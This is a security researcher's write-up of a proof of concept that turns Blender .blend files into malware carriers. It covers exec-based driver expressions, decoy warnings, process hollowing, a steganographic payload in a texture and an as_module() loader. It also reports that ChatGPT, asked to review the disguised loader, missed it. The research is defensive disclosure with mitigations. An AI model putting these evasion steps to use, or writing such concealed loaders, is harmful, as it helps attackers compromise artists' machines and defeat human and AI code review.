Pixels, Polygons, and Payloads:
Malware delivery in 3D software pipelines
- Oliver Simonnet
- Lead Security Researcher
Executive Summary
This research explores an unconventional malware delivery vector, demonstrating how trusted creative software tools can be repurposed to deliver payloads in ways that bypass common defences, user expectations, and AI-based analysis. The work concludes with the creation of a successful Proof-of-Concept (PoC) for code execution and AV/EDR evasion using the open-source 3D software suite Blender, as can be seen below:
The research does not uncover, abuse, or rely on any software vulnerabilities in the Blender platform itself; instead, it leverages the software’s legitimate Python scripting capabilities (widely used in professional CGI workflows) to execute custom code unexpectedly. Its success capitalises on typical expectations within a niche industry where script auto-execution is often enabled by default, and security warnings are commonplace and expected. However, the research also finds that even with warnings enabled, attacks can divert user attention and conceal malicious routines within warning overrides and plausible and fully native API usage.
While many traditional code execution vectors are well understood and mitigated, this research highlights how attacker creativity can exploit overlooked workflows and the implicit trust placed in niche tools within specialised industries.
Introduction
I’ve always had a passion for animation. I spent years as a hobbyist 3D artist, worked as a freelance technical animator, and even did a short stint in vehicle design. These days, my career is firmly rooted in cyber security. But I’ve always been keen to find a way to have these two worlds intersect.
That led me to a question: Historically my work has been in the finance and tech sectors, but if a threat actor were targeting the media or animation industry, would a malicious 3D asset file (like a model, character rig, or scene file) be more effective than the usual malware-laden Word document, PDF, or Excel add-in, etc?
Traditional attack vectors, such as office suite exploitation, are well-known and increasingly well-defended against. In contrast, a 3D asset file with an embedded malicious script might slip past both the user and security controls far more easily, simply because it’s unexpected – or maybe even because it is expected.
With that in mind, I set out to explore how practical this might be and see how vulnerable the media and animation industries are to this kind of threat with what I had access to.
This research article dissects this idea, compares it with conventional malware delivery techniques, and walks through the creation of a benign-looking Remote Code Execution (RCE) exploit leveraging native Blender API calls and forged warning messages to avoid suspicion and detection.
The Usual Tradecraft
Over the years, attackers have developed many ways to trick users into executing malicious code. To set the stage, before diving into 3D software, I will recap some of the common malware delivery vectors and how we, as defenders, have responded.
Office Macros
The classic. Malicious Office documents with embedded macros were running rampant for decades. While still in use, modern versions of Microsoft Office and mature enterprise policies have made this technique significantly more complicated to exploit, though not impossible:
Files downloaded from the internet are now tagged with a Mark-of-the-Web, which disables macros by default, and any attempt to enable them prompts multiple security warnings. As a result, most organisations now treat macro-enabled documents (.docm, .xlsm, etc.) with high suspicion or block them entirely.
That said, bypasses exist, and macros remain a viable technique in many environments. The success rate may have decreased, but the technique hasn’t gone anywhere, especially when targeting organisations with more lax security controls.
HTA (HTML Applications)
HTA files are another well-known method for malware delivery. These allow the execution of VBScript and JScript outside of a browser environment using Microsoft’s mshta.exe. In practice, they are written much like a macro-enabled document, but without the need for Office.
This technique has been around a long time and is often combined with other tradecraft, such as malicious LNK files and HTML smuggling to achieve code execution and evade detection:
However, HTA files are less commonly encountered by the average user, which could raise suspicion, as it is not an everyday format. That said, it remains a valid and common “living off the land” technique for attackers looking to avoid macro-related defences.
Excel Add-ins (XLLs)
As Microsoft tightened macro security, threat actors adapted and started using precompiled custom Excel add-in files (.xll) as a macro-free alternative. This shift was noted in the early 2020s, with reports finding that both APT groups and commodity malware campaigns increasingly used XLL attachments in phishing attacks.
When opened, Excel will prompt the user to install the add-in. If the user accepts, the XLL file executes native DLL-based code within the Excel process. To the user, opening the file may appear like opening a typical spreadsheet, adding to its deceptive potential, whilst in the background custom malware is executed:
Microsoft has, however, since begun blocking untrusted XLLs by default in newer versions of Office, helping mitigate this attack vector and forcing attackers to get more creative.
These more traditional methods (and many others, like LNK shortcuts, PDF exploits, etc.) form a well-established malware-delivery toolkit. However, although they are still valid delivery mechanisms, defenders have spent years learning to detect and mitigate them, and the element of surprise is often lost.
Scripting in Animation Software
Many creative software packages used in the animation, media, and design industries support scripting, much like macros in Office applications. Over the years, I’ve worked with several of these tools: LightWave 3D, Autodesk Maya, 3ds Max, Blender, AutoCAD, and others.
It’s easy to forget that these tools, while built for artistic workflows, often include powerful scripting capabilities to support automation and custom tool creation – which is a critical part of modern CGI production pipelines. For example:
- Autodesk Maya supports MEL (.mel) and Python (.py)
- Blender supports Python (.py)
- 3ds Max supports MaxScript (.ms) and Python (.py)
- LightWave 3D supports LScript (.ls) and Python (.py)
- Adobe software supports JavaScript (.jsx) and Python (.py)
Although many of these software packages initially supported only proprietary scripting languages, over the years there has been a significant adoption of Python. This makes it relatively easy for users to start writing code without having to learn multiple programming languages, and also easier for attackers to target them.
For this research, I focused specifically on Blender as it’s free, open-source, and hugely popular, supports Python, and - last but not least - I’m most familiar with it. That said, the broader security implications extend to any digital content format that allows embedding and automated execution of custom code.
Blender’s Python Power
Blender introduced Python scripting in version 2.10 (way back in 2000). This marked a turning point in its development, and since then, scripting has become deeply integrated into Blender’s ecosystem. It’s now frequently used for everything from modelling automation to extension development.
Any user can open Blender’s Scripting workspace, write some Python code, and interact directly with the 3D scene and Blender UI via the Blender Python API (bpy):
Although the above is a simple example, the possibilities are almost limitless. Python scripting in Blender is routinely used to streamline workflows, create custom interfaces, and integrate the software into larger production pipelines.
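To give a flavour of how little code this takes, here is a minimal sketch of my own (the function name and behaviour are illustrative, not from any production pipeline) that renames whatever is currently selected in the scene. It is guarded so it only acts when run inside Blender’s bundled interpreter:

```python
try:
    import bpy  # only available inside Blender's bundled Python
except ImportError:
    bpy = None

def tag_selected_objects(prefix="reviewed_"):
    """Rename every selected object in the scene via the bpy API."""
    if bpy is None:
        return []  # not running inside Blender
    renamed = []
    for obj in bpy.context.selected_objects:
        obj.name = prefix + obj.name
        renamed.append(obj.name)
    return renamed
```

Pasting a function like this into the Scripting workspace and running it is the everyday workflow this article builds on.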
A classical use-case is the development of custom animation rig interfaces for complex characters. These are control panels designed to simplify rig navigation and speed up the animation workflow for complex assets with many moving parts and constraints:
However, this power comes with inherent risk. Because scripts operate as active code rather than static assets, they can be embedded directly within a .blend file. These files will then carry arbitrary Python code, making them a viable malware delivery mechanism for threat actors.
This is not new knowledge, however. It has been documented for over a decade, as far back as 2009, when CVE-2009-3850 was registered to highlight that simply opening a .blend file with an embedded script could result in code execution without explicit user consent.
Blender’s developers have since implemented a number of safeguards to reduce this risk, such as script auto-run controls, directory allow-listing, and active code warning prompts. But the fundamental capability to execute arbitrary Python code from within a project file remains. As with Office macros, it’s a feature that’s powerful in the right hands and dangerous in others.
Security Controls in Blender
So, if arbitrary code execution is possible in Blender, what prevents malicious .blend files from causing harm?
Over time, Blender has introduced a combination of security warnings and user preferences aimed at reducing the risk of unintended code execution via embedded scripts. By default, automatic execution of Python scripts is disabled, and when a file containing an embedded script is opened, Blender displays the following warning:
This message alerts the user that there is a Python script that is registered to auto-run in the file, and that auto-run is disabled. The user can then choose to “Allow Execution” (run the embedded scripts) or “Ignore” (skip it). There is also an option to permanently enable auto-run script execution, which will enable the Auto Run Python Scripts setting under Blender’s "Save & Load" preferences:
While enabling this setting may seem ill-advised from a security standpoint, many animators and riggers regularly work with .blend files that require scripting for rig controls, UI elements, and other automations. As a result, it is not uncommon for users in production environments to enable auto-execution for convenience.
What’s important to note is that this setting governs all areas within Blender where Python scripts can be embedded, which covers many areas and features, including:
*Only if the initial script that registers them is allowed to run.
Driver-Based Execution: A Quirky Edge Case
Drivers are an interesting edge case, intended for simple mathematical operations. However, with some experimentation, I found that you can use Python’s __builtins__ module to access exec() and eval() within these expressions to execute arbitrary code. For example, the following driver could be used to spawn calc.exe:
var + (0.0 if builtins['exec']('import os; os.system(\'calc.exe\')') else 0.0)
Successful execution of this can be seen below:
This is an interesting bypass, as it essentially smuggles code inside what appears to be a basic mathematical formula. However, Blender flags any expression that strays from basic mathematical operations as a Python script, and will subsequently trigger the same auto-run warning when the file is opened - unless the user has explicitly allowed auto script execution:
An interesting side effect of Blender’s warning mechanism is that driver expressions take precedence in the warning display. That means, if a .blend file contains both a script and a complex driver expression, the warning will flag and highlight the driver, not the script text block. From a malicious perspective, this can be used to help evade detection: the driver expression warning could distract a reviewing user from a primary malicious text block by presenting a benign-looking but complex driver, such as:
1 + math.sqrt(var)
This does nothing useful, but it is complex enough for Blender to treat it as a scripted expression rather than a simple driver, overriding any text block security warnings. Once the user clicks "Allow" on the driver (as it seems perfectly benign), no further warning will be shown - even if a more dangerous script is present in the file:
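Such a decoy driver can even be set up programmatically. The sketch below is my own (the object name and property choice are assumptions); the calls themselves — driver_add(), driver.variables.new(), and the expression attribute — are standard bpy driver APIs:

```python
try:
    import bpy  # driver APIs exist only inside Blender
except ImportError:
    bpy = None

# Benign, but complex enough that Blender treats it as a scripted expression
DECOY_EXPRESSION = "1 + math.sqrt(var)"

def add_decoy_driver(obj_name):
    """Attach a scripted-expression driver to an object's Z location."""
    if bpy is None:
        return False  # not running inside Blender
    obj = bpy.data.objects[obj_name]
    fcurve = obj.driver_add("location", 2)  # index 2 = Z component
    driver = fcurve.driver
    var = driver.variables.new()
    var.name = "var"
    var.targets[0].id = obj
    var.targets[0].data_path = "location.x"
    driver.expression = DECOY_EXPRESSION
    return True
```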
Real-World Practices: Artists and Auto-Execution
Despite Blender’s built-in protections and the technical limitations of various execution pathways, the human factor may just tip the balance in favour of attackers.
In professional environments, it is common for artists and studios to enable the “Auto Run Python Scripts” option. For many Blender users, security warnings are seen as unnecessary friction, especially when working with character rigs or other complex assets that rely on embedded scripts for legitimate purposes, such as custom UI panels, automation tools, or scene setup functions.
Over time, many artists become conditioned to ignore script warnings or disable them altogether, falling back on trust. If the file came from a colleague, a community site, or a known artist, it's assumed to be safe. This trust-based behaviour creates a false sense of security and breeds an ideal environment for threat actors.
That said, more technically inclined users, or those in more security-conscious environments, may choose to inspect and review embedded scripts before allowing them to run. In these cases, they’ll typically open the Text Editor panel in Blender and review the code manually, or paste it into a Generative AI tool for review. A blatant malicious payload (e.g. a call to os.system("ransomware.exe")) or even a suspiciously obfuscated script would likely stand out significantly from typical Blender scripting practices and be flagged as malicious.
Whilst initially conducting this research, I came across little evidence of this type of attack in the wild. However, over the past months, I found at least one real-world example of malware disseminated in a .blend file. In this case, a user on Reddit reported a seemingly innocent chair model which, when opened, executed a heavily obfuscated and clearly malicious Python script that decoded and executed a second-stage PowerShell payload.
These observations confirmed my suspicions that a Blender-based attack is not only plausible, but already happening in the wild, even if it’s not heard of very often – if at all. The next question became: could such an attack be crafted in a more sophisticated way that can evade user scrutiny, AI-based analysis, and detection by modern AV or EDR tools?
Weaponising .blend Files for Malware Distribution
Having set the stage, we can now dive into the fun of exploring how a .blend file might be transformed into a viable malware delivery mechanism. The objective is simple:
Embed a malicious payload within a Blender file that executes with minimal detection and does not appear obviously suspicious, even under human and AI-based scrutiny.
Plan of Action:
A simplistic approach might be to embed a text block that calls os.system("malware.exe"), with malware.exe embedded in the Blender file, mimicking the original 2009 CVE. This would indeed execute a payload, but it would also be extremely obvious and highly detectable. Any user reviewing the script would see the call immediately, and virtually all AV products would flag it before EDR even needed to kick in.
So, a stealthier, more sophisticated method is required, built around several key goals:
- Avoid obvious indicators of compromise - No direct calls to os.system, subprocess, or ctypes.WinDLL("kernel32").WinExec in the Blender file’s text block. These are well-known signatures and would alert both users and AV/EDR tools.
- No files written to disk - The payload must execute entirely in memory. Writing to disk leaves more obvious artefacts and significantly increases the risk of detection.
- Blend in with legitimate API usage - The code should only use Blender’s legitimate native APIs. This reduces suspicion and increases the chance of bypassing both manual inspection and security control heuristics.
- Minimise behavioural detection - Aggressive actions such as memory allocation or manipulation using VirtualAlloc could trigger endpoint detection systems. These aspects should be disguised or implemented using alternative APIs.
With that in mind, the process of creating this payload can be broken into four steps:
1. Create the main payload – in this case, shellcode to launch calc.exe. In a real-world scenario, this could initiate a first-stage implant or ransomware payload.
2. Execute the shellcode in memory using a shellcode runner, without dropping files to disk.
3. Hide the runner within the .blend file to avoid exposure during code review, scanning, and heuristic detections.
4. Trigger execution of the runner automatically using only benign-appearing, native Blender mechanisms, and redirect the user’s attention elsewhere for good measure.
Creating Custom Shellcode
An obvious first step might be to generate shellcode using MSFvenom. However, these payloads have long been widely recognised by modern AV and EDR systems. Even if you avoid writing the payload to disk, in-memory execution of such well-known byte patterns and decoding routines is almost guaranteed to be caught.
To make this proof of concept realistic, it requires custom shellcode, written from scratch or at least heavily modified to avoid detection.
I opted to write my own bespoke shellcode in x86_64 assembly, targeting 64-bit Windows systems (as Blender is primarily used on 64-bit Windows in most professional environments). The payload requirement is fairly simple (spawn calc.exe), so it is easy to write and obfuscate, and it provided a clean test for code execution pathways.
As this will be injected directly into memory, a critical requirement is that the shellcode be position-independent, allowing it to execute from any memory address without hardcoded offsets. To achieve this, the shellcode can perform a Process Environment Block (PEB) walk to dynamically locate the runtime base address of kernel32.dll, which can then be used to resolve the relative offsets of any additionally required API addresses:
With the address of kernel32 obtained, additional APIs could be dynamically resolved to spawn a new process, including k32.CreateProcessA and k32.TerminateThread:
Once the shellcode was written and tested, I used the Python Keystone library to assemble the opcodes, and a custom encryption script to prepare them for the shellcode runner. This produced a concise binary blob of machine code instructions capable of invoking the required Windows API calls to launch calc.exe from anywhere in memory:
While the actual shellcode details are not the focus here, what matters is that this payload was custom-authored, encrypted, and obfuscated. Therefore, it is unlikely to be detected by signature-based security controls.
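The encryption routine itself is not reproduced in this article, but a simple reversible scheme in that spirit, such as a rolling XOR over the assembled opcodes, might look like the sketch below (entirely my own assumption, not the actual routine used):

```python
def xor_transform(shellcode, key):
    """Rolling XOR over the byte blob: the same function both
    encrypts (before embedding) and decrypts (at runtime)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(shellcode))

# Hypothetical usage: prepare assembled opcodes for embedding.
# These are placeholder bytes, not real shellcode.
opcodes = bytes([0x48, 0x31, 0xC0, 0x50])
blob = xor_transform(opcodes, b"\x5a\xa5")
```

Because XOR is its own inverse, the runner only needs the key and the same function to restore the original bytes in memory.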
However, shellcode on its own is inert; it lacks all of the structure that makes a PE executable run, and as such requires a dedicated runner: a mechanism that allocates memory, writes the payload into it, and triggers its execution.
Creating a Shellcode Runner
As Blender supports Python, the shellcode runner can be implemented in Python, using the ctypes library to access the required lower-level Windows APIs. This enables native execution within Blender’s embedded Python environment without requiring any external dependencies.
For this proof of concept, I implemented the runner using a process hollowing technique where a legitimate process is started in a suspended state, overwritten with malicious code, and then resumed. This method is relatively stealthy and can evade various behavioural detections. A high-level overview of its implementation is as follows:
1. Decode and decrypt the embedded shellcode using lightweight arithmetic logic.
2. Create a new suspended process (e.g. notepad.exe) using CreateProcessW.
3. Query the process information with NtQueryInformationProcess.
4. Read its memory and locate its entry point using ReadProcessMemory.
5. Overwrite the entry point with the decrypted shellcode via WriteProcessMemory.
6. Resume execution via ResumeThread, causing the injected shellcode to execute.
The initial setup for this process can be seen below:
As no part of this runner touches the disk, it avoids typical AV file-based detection. However, certain strings (e.g. notepad.exe, kernel32.dll, etc.) could be flagged by EDR systems monitoring suspicious API usage. To mitigate this, strings were hex-encoded and decoded at runtime, obfuscating the script slightly:
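The idea is simple: store each sensitive string as an inert-looking hex literal and rebuild it only at runtime. A minimal sketch (the helper and variable names here are my own, not taken from the actual runner):

```python
def deobfuscate(hex_string):
    """Rebuild a sensitive string from its hex form at runtime."""
    return bytes.fromhex(hex_string).decode("utf-8")

# "notepad.exe" and "kernel32.dll" stored as hex so the plain
# strings never appear in the script's source
TARGET_PROC = deobfuscate("6e6f74657061642e657865")
TARGET_DLL = deobfuscate("6b65726e656c33322e646c6c")
```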
With the main components in place, the encrypted shellcode can be embedded as a byte array, and the decoding and decryption logic implemented to restore it in memory before use:
Once executed, the runner proceeds to launch a suspended notepad.exe instance, reads its entry point, writes the decrypted shellcode into that location, and resumes execution:
To test this, the script was run directly outside of Blender to confirm it could execute calc.exe via the injected shellcode, demonstrating successful in-memory code execution:
While technically effective, if stored directly inside a .blend file, this code would be easily detected, both by automated tooling and by human analysis:
It includes raw Windows API usage and low-level memory manipulation.
It lacks any connection to Blender’s APIs or expected scripting behaviour.
The presence of obfuscated strings and binary logic is inherently suspicious.
Even a casual user might recognise that something is wrong, and a more security-aware one would almost certainly flag it as a remote access tool or malware. Additionally, storing the runner as a persistent text block inside the file makes it vulnerable to AV scanning, particularly since both the decoding logic and shellcode may raise flags, even in an encrypted format.
Hiding the Payload
This is where the real creativity began. Blender contains numerous features that could potentially aid in concealing malicious payloads. My initial idea was to encode each byte into a different shader node value somehow. However, this became very tedious to implement, and developing a hidden yet functional extraction method was impractical based on my requirements. So instead, I turned to Texture Images!
It is common for 3D asset files to embed image textures for characters and objects. This led to the idea of hiding the runner inside a texture image using steganography. By encoding the payload into the image’s pixel data, the runner would be undetectable within the .blend file, and it wouldn’t be visible within Blender’s scripting features at all.
To test the concept, I created a simple 3D scene featuring a laptop object with a texture image UV-mapped to the screen:
For the steganographic technique, I implemented a Least Significant Bit (LSB) encoding tool in Python (StepSteg.py) to hide the payload one bit at a time in the LSB of an image's RGBA pixel channels. While this alters the image's file signature, the integrity of the texture image itself is not a factor in this PoC, and the visual difference is imperceptible to the human eye:
Although the steganography process itself is relatively straightforward, after a number of errors I realised that I needed to account for critical differences between how Blender and standard Python libraries handle image pixel data:
- Blender stores pixel data as a flat array of floating-point values (0.0–1.0) in RGBA order. It uses an OpenGL-style coordinate system, with pixel index 0 located at the bottom-left of the image and rows progressing from bottom to top.
- The Python Imaging Library (PIL), in contrast, uses a top-left origin and stores pixels as a multi-dimensional array of bytes.
To simplify development, I first implemented encoding and decoding using PIL. This allowed me to validate the concept independently of Blender using a hardcoded binary header and trailer to delimit the embedded data and ensure reliable extraction:
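Independent of any imaging library, the core LSB logic packs each payload byte into the lowest bit of eight consecutive channel values, bracketed by marker bytes so the decoder knows where the data starts and stops. The sketch below operates on a flat list of 0–255 channel values; the marker values and function names are my own illustrations, not the delimiters used in StepSteg.py:

```python
HEADER = b"\xde\xad"   # hypothetical start marker
TRAILER = b"\xbe\xef"  # hypothetical end marker

def lsb_encode(channels, payload):
    """Hide payload bits in the LSBs of a flat list of channel values."""
    data = HEADER + payload + TRAILER
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    if len(bits) > len(channels):
        raise ValueError("image too small for payload")
    out = list(channels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # flip only the lowest bit
    return out

def lsb_decode(channels):
    """Recover the payload bytes found between HEADER and TRAILER."""
    bits = [c & 1 for c in channels]
    data = bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[n:n + 8]))
        for n in range(0, len(bits) - 7, 8)
    )
    start = data.index(HEADER) + len(HEADER)
    end = data.index(TRAILER, start)
    return data[start:end]
```

Since each channel value changes by at most 1/255, the visual difference is imperceptible, exactly as observed with the screen texture.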
This could then be run to encode the process hollowing shellcode runner inside the screen texture PNG image using the following commands:
The result was a PNG image visually identical to its original counterpart but containing a Python-based shellcode runner encoded bit-by-bit within its pixels. This successfully decoupled the payload from Blender’s internal text blocks and scripting UI, reducing the risk of immediate detection when the file is downloaded or opened.
The next challenge was adapting the extraction routine to work entirely within Blender, in a manner that is not obvious, uses only native Blender APIs, and avoids the need for external libraries or suspicious system calls.
Finding a Benign Execution Path
To extract and run the payload, I first needed to identify methods within Blender that could be used to interpret additional Python code from strings, without using blatantly suspicious functions like exec() and eval().
While executing Python from a string using exec("code") is trivial, it is also highly suspicious. Calls to exec(), eval(), or compile() are often monitored by AV and EDR tools, and the presence of a large base64-encoded blob passed to one of these functions would immediately raise red flags for any reviewing user.
With that in mind, I began researching Blender’s Python APIs for execution pathways that could meet these criteria. After a lot of documentation review, I had a few “viable” options:
Option 1: bpy.ops.text.run_script()
This native Blender operator executes the contents of an internal text block. However, it requires the active UI context to be a "TEXT_EDITOR" area and will fail otherwise. It also shifts the UI panel from the executing script to the target script when called, making it extremely obvious and unsuitable for stealth:
Option 2: bpy.utils.execfile(filepath)
This method executes an external file via Blender’s embedded Python interpreter. However, it can’t be used to interpret text blocks and would instead require writing the payload to disk, almost definitely resulting in detection and quarantine:
Option 3: bpy.app.driver_namespace["id"]
This dictionary allows additional functions and variables to be called within scripted expression drivers. While very interesting, this would require additional setup, such as mapping functions manually into the namespace and triggering execution from driver expressions. Technically feasible but introduces more complexity and artefacts:
Option 4: bpy.data.texts["id"].as_module()
This method compiles a Blender text block into a Python module, allowing functions to be invoked as if they were defined in an imported script. It works entirely in memory, doesn’t touch the disk, and integrates seamlessly into Blender’s scripting model - making it the most promising candidate:
This method enables a stealthy approach where the payload runner can be extracted as a string and then executed using the following native Blender API calls:
1. Create a new ephemeral text block in memory using bpy.data.texts.new()
2. Populate it with the extracted Python shellcode runner using from_string()
3. Compile it into a module using as_module()
4. Invoke an embedded runner function using module.execution_method()
5. Remove the text block using remove()
This implementation avoids suspicious API calls, doesn’t touch the disk, and does not expose the payload directly in the interface. Even the naming can be designed for plausibility; e.g., calling the text block watermark_data and the execution method validate() could be convincing in a typical asset pipeline scenario.
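Put together, the whole chain amounts to only a few native calls. Below is a guarded sketch of my own; the block and function names follow the watermark pretext, and from_string() and as_module() are standard bpy text APIs:

```python
try:
    import bpy  # only available inside Blender
except ImportError:
    bpy = None

def run_text_as_module(source, entry="validate"):
    """Load source into an ephemeral text block, compile it with
    as_module(), invoke one function, then remove the block."""
    if bpy is None:
        return None  # not running inside Blender
    block = bpy.data.texts.new("watermark_data")
    block.from_string(source)
    module = block.as_module()
    try:
        return getattr(module, entry)()
    finally:
        bpy.data.texts.remove(block)
```

Nothing here looks out of place in a rig script, yet the string passed in can be arbitrary Python.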
Creating a Stealthy Loader Script
With a viable payload and execution method ready, the final step was to create a stealthy loader that could extract, decode, and execute the shellcode runner within Blender without raising suspicion.
First, I implemented a legitimate Rig UI script for the laptop armature within the scene to mimic the code complexity of a genuine character rig. Following this, I needed to somehow incorporate loading code for the shellcode runner inside it. However, as Blender stores image pixel data differently from PIL, the first challenge was to re-implement the steganography decoding logic using Blender’s image APIs.
Since the payload had been encoded into the image texture using LSB steganography on byte-level RGBA channels, I was a bit worried that Blender’s float conversion might corrupt the least significant bits. However, this was not the case, and the original byte values could be derived reliably using a custom function that reversed Blender’s float-to-byte mapping.
Part of this logic was wrapped in a function called convert_from_opengl(), located within the scene’s Laptop RIG_UI.py script:
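The core of that conversion is mapping Blender’s 0.0–1.0 floats back to exact byte values and re-ordering the bottom-up rows into top-down order. A sketch of the underlying arithmetic (the function names are my own; this is not the article’s convert_from_opengl() verbatim):

```python
def float_to_byte(value):
    """Invert Blender's byte/255.0 float mapping; rounding recovers
    the exact original byte, so the LSBs survive the round trip."""
    return int(round(value * 255.0))

def flip_rows(flat_rgba, width, height):
    """Re-order a flat bottom-up RGBA array into top-down (PIL-style) rows."""
    row = width * 4  # four channels per pixel
    return [
        flat_rgba[(height - 1 - y) * row + x]
        for y in range(height)
        for x in range(row)
    ]
```

The round trip being lossless for all 256 byte values is what makes the LSB extraction reliable despite the float conversion.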
With pixel extraction and restructuring in place, the next step was to decode the LSB values and extract the embedded payload. A function named extract_watermark() was implemented to scan for the payload’s binary signature, decode the pixel values, extract the LSBs, and rebuild the shellcode runner as a Python string stored in the variable watermark:
To avoid placing suspicious binary markers directly into the loader script, the signature string was stored as a custom property on the laptop rig armature within the scene. This blends in well as it's fairly typical for armatures and bones to have custom properties assigned:
Once the payload was extracted, it was dynamically inserted into a new in-memory text block named watermark_data. This block was then compiled using as_module(), and the runner's execution method, validate(), was invoked, executing the process hollowing payload. Following this, the text block was removed to clean up the newly generated artefacts:
Since most Rig UI scripts are designed to run automatically when a .blend file loads, the loader was integrated into the main() method of the rig’s startup logic. However, immediate execution on load isn’t ideal, as Blender’s UI and context may not be fully initialised. To solve this, a one-time timer was registered with a short delay of 0.1s to defer execution of validate_watermark() until after the UI was ready:
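Blender’s timer API makes this deferral straightforward. A guarded sketch (validate_watermark() is the loader entry point from the pretext above and is not defined here; bpy.app.timers.register() is the real API):

```python
try:
    import bpy  # timers exist only inside Blender
except ImportError:
    bpy = None

def _deferred_check():
    """Runs once the UI is ready; returning None unregisters the timer."""
    validate_watermark()  # hypothetical loader entry point
    return None

def register_deferred(delay=0.1):
    if bpy is None:
        return False  # not running inside Blender
    bpy.app.timers.register(_deferred_check, first_interval=delay)
    return True
```

Because the timer callback returns None, it fires exactly once, matching the one-time nature of the "validation" routine.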
This approach is both functionally sound and plausible, as the validation routine would only need to happen once when the file is opened, not repeatedly during animation or rig use. This is ensured by registering the handler only once, using a top-level register_handlers() method called within main():
Finally, the rig script itself is registered for auto-execution on file open—standard practice for character rigs using custom UI scripts. This allows the entire process to unfold seamlessly without user interaction:
As an optional final touch, to avoid the warning directing users to the script itself, we can add a benign complex driver somewhere in the file that will be prioritised over the text block in Blender’s security warnings:
This, however, is not strictly necessary, as the spirit of this PoC is for it to work regardless of whether the user reviews the script or not. Still, it is a deceitful and effective technique that can be implemented, and I want to raise awareness of it.
Execution of the PoC
With the loader implemented and integrated into a legitimate Rig UI script for the laptop asset, which is registered for auto-execution, the .blend file can be saved and distributed via email, a community asset marketplace, or any other similar sharing platform.
Scenario 1 – Auto-Run Scripts Disabled
When the target opens the file with Blender’s Auto-Run Python Scripts setting disabled, Blender presents a security prompt. In this PoC, the warning is intentionally orchestrated to override the text block and instead warn on the benign driver expression, rather than the Rig UI script, drawing attention away from the payload:
That said, the warning gives no indication of where this driver actually lives, which could itself raise suspicion. An attacker could therefore forgo the decoy and let the warning highlight the actual script; the user would still be presented with an expected, benign-looking warning, since a Rig UI script is something the file legitimately requires:
Either way, the warnings seem benign enough, as the underlying code responsible for them looks harmless at a glance. If the user selects “Allow Execution” in either case, no further warnings are shown and the payload executes; in this case, spawning calc.exe via process hollowing of a suspended notepad.exe process:
Scenario 2 – Auto-Run Scripts Enabled
If the target has Auto-Run Scripts enabled, no warning is shown at all in either scenario, and the script will execute during Blender's scene initialisation. Even if the user inspects the internal text blocks, there is very little that would likely jump out as malicious behaviour due to the pretext, obfuscation, steganographic storage, and plausible native API usage.
The whole exploit chain can be summarised using the following diagram:
Validation via Event Logs
After execution, this chain of events can be identified by filtering the Windows Security event log for Event ID 4688 (process creation), revealing the following:
First, blender.exe creates notepad.exe (this is the “watermark” loader executing the runner):
Secondly, notepad.exe creates calc.exe, confirming that the shellcode was successfully injected into the notepad.exe process by the runner and executed as designed:
Scrutinising the Payload
With the PoC created and verified, the next step was to consider what would happen if a technically minded user did inspect the text blocks before allowing script execution. This was a key part of this research, so in an attempt to simulate this, the Laptop Rig UI script was submitted to ChatGPT for review using the following prompt:
"Here is a script from a Blender file I have with a laptop rig. Is there anything suspicious, or does it look fine?"
ChatGPT responded with ten observations, none of which flagged malware or suspicious behaviour, with its conclusions stating the following:
Interestingly, one of the observations did focus on the watermark validation code; however, it did not flag anything related to malware, nor any issues around the use and risks of as_module():
This result reinforced the strength of the PoC: using these methods, a loader can blend into a plausible creative workflow and remain undetected. Even when subjected to automated AI-based analysis, the malicious execution path may not be identified or highlighted as unusual.
Reflections and Recommendations
The original CVE-2009-3850 RCE issue was not a coding flaw so much as a design choice, allowing Blender to execute embedded scripts automatically. Later versions addressed this by disabling auto-execution by default and prompting for user permission.
This research does not exploit or uncover a new vulnerability; it uses Blender’s scripting feature exactly as intended, relying on human trust and plausible code to bypass suspicion, much like macro-based malware before defenders and tooling matured to mitigate it.
So, what could be done better to prevent this?
Mitigation Strategies: For Individual Users
- Treat .blend and other complex project files with the same caution as any other executable content. If a model comes from an unknown or unsolicited source, open it in a safe, isolated environment.
- Keep Auto Run Python Scripts disabled. If prompted to allow execution and you were not expecting the file to contain scripts, choose to ignore, and delete any text blocks.
- Manually inspect any unexpected or unknown code before enabling script execution. Use Blender’s Text Editor to review Python text blocks, and the Driver Editor to view drivers and handlers.
Mitigation Strategies: For Studios and Enterprises
- Use Blender’s Trusted Paths feature to allowlist approved project directories for auto-execution. Files from Downloads or temporary folders should remain untrusted by default.
- Implement Secure Web Gateways (SWG), HRM technologies, and System Policies to prevent community assets from being introduced into your production environments.
- Deploy sandbox or virtual machine environments for testing community assets, if needed, before they enter the main production pipeline.
- Implement pre-processing scripts to review .blend files for suspicious code elements before artists open them. This could include searching for high-risk keywords (e.g. ctypes, subprocess, as_module, run_script, etc.) in text blocks, or for unusual driver expressions.
- Ensure antivirus/EDR tools are configured to detect unusual Blender behaviour, such as spawning new processes or calling interpreters. While .blend files themselves may not be scanned deeply, runtime behaviours can still be monitored to detect evidence of memory and process manipulation.
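The pre-processing idea above can be sketched as a crude byte-level scan. This is a hypothetical helper, not a .blend parser: it simply flags keyword hits anywhere in the file (text blocks, driver expressions, and so on). Legacy compressed .blend files are gzip-wrapped, so those are decompressed first; newer Blender versions may use Zstandard compression instead, which would need a third-party library and is not handled here.

```python
import gzip
from pathlib import Path

# High-risk keywords suggested above; extend for your own pipeline.
SUSPICIOUS = (b"ctypes", b"subprocess", b"as_module", b"run_script")


def scan_blend(path):
    """Return a sorted list of suspicious keywords found in the file.

    A pre-processing triage check, not a parser: a hit anywhere in
    the raw bytes is enough to warrant a manual review in Blender.
    """
    data = Path(path).read_bytes()
    if data[:2] == b"\x1f\x8b":  # gzip magic: legacy compressed .blend
        data = gzip.decompress(data)
    return sorted({kw.decode() for kw in SUSPICIOUS if kw in data})
```

A file that trips the scan would then be opened only in an isolated environment, with its text blocks reviewed before any execution is allowed.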
Potential Blender Improvements
The current security warnings alert the user to only one script or driver that is about to auto-execute, often without context. An improved approach could be to list all registered script assets in the file (text blocks, scripted drivers, and registered handlers) alongside their names, sizes, and content before execution. This would allow the user to see:
- Which scripts will run automatically.
- Which scripts exist but will not auto-run without manual activation.
- How large the scripted content is.
- A quick preview of its content.
This more transparent approach would give both casual users and technical reviewers a clearer view of potential risk before allowing execution. Furthermore, this would also prevent driver expressions from obscuring warnings about potentially malicious text blocks.
